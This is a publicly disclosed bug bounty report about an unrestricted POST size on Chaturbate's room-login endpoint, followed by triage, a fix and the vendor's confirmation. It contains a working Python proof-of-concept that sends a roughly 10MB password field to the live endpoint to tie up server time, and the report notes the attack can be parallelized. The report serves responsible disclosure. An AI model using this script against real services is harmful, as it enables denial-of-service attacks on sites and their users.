Unrestricted POST request size on roomlogin endpoint
State Resolved (Closed)
Disclosed publicly 2018-10-07T14:55:42.685Z
Reported To
Weakness Denial of Service
Bounty $200

submitted a report to Chaturbate.

POST requests to the endpoint /roomlogin/<user> are not limited in size. While the main website login endpoint correctly limits the size of the request, this endpoint does not. This can be a means to perform a DoS attack.

Steps To Reproduce:

  1. <user> has a password-protected stream.
  2. Send a large POST request to /roomlogin/<user> (e.g., a really long password).

Expected behaviour

HTTP error 413 is promptly returned.

Actual behaviour

The server reads and processes the whole request, consuming a large amount of time.


This Python snippet can reproduce the issue. A ~10MB request consumes about 30 seconds of server time. I did not proceed further to avoid disrupting the service and because this attack, which can be easily parallelized, has itself a pretty serious impact.

import requests

# Target room login endpoint and CSRF token (redacted in the public report)
url = "https://it.chaturbate.com/roomlogin/█████/"
csrf = "███████"

# ~10MB password field; the endpoint accepts and processes it in full
password_size = 10 * 1000 * 1000
payload = {'password': 'a' * password_size, 'next': '/████/', 'csrfmiddlewaretoken': csrf}

s = requests.Session()
s.headers.update({'referer': url})
s.cookies.set("csrftoken", csrf)
s.cookies.set("sessionid", "█████████")
r = s.post(url, data=payload)

# Time the server took to answer the oversized request
print(r.elapsed)

Suggested resolution steps

  • Put a reasonably low limit on the request size, as already happens with the main login.
  • (Optional) Limit the max-size of the input element #id_password to 64 characters.


DoS of the main website. The attack can be easily parallelized, leading to a potentially severe DDoS.


lucach Activities::Comment
(Human Augmented Signal) I confirm that the report is reproducible (POC attached), has a security impact and is in scope (targets main website).

williammmllc Activities::ReportSeverityUpdated

williammmllc Activities::BugTriaged
Thanks for the report. The login length is limited to prevent a DDoS on the hash function; however, this doesn't apply to the room login. However, we will limit the submit size.


lucach Activities::Comment
I perfectly understand the difference between login- and room- passwords, but the significant processing time of such a request still looks pretty worrisome. Thanks for the bounty and the quick response.

williammmllc Activities::BugResolved
Thanks for the report. This should now be limited to 1MB; can you confirm?

lucach Activities::Comment
I can confirm: now the longest request cannot take more than a bunch of seconds of server time, which is a reasonable limit. Well done and congratulations on the quickness of the process!

williammmllc Activities::AgreedOnGoingPublic
Thanks for the confirmation!

lucach Activities::AgreedOnGoingPublic

lucach Activities::ReportBecamePublic